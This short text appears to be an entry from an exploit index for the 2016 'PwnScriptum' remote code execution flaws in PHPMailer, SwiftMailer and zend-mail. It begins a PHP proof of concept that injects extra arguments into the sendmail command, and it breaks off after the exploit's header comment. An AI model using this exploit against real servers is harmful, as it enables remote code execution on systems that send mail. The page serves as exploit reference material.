phpmailer

条件： PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) ‘PwnScriptum’ Remote Code Execution CVE-2016-10033, CVE-2016-10034, CVE-2016-10045, CVE-2016-10074 EXP (PHP) <?php /* PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) Discovered/Coded by: Dawid Golunski (@dawid_golunski) https://legalhackers.com Full Advisory URL: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no....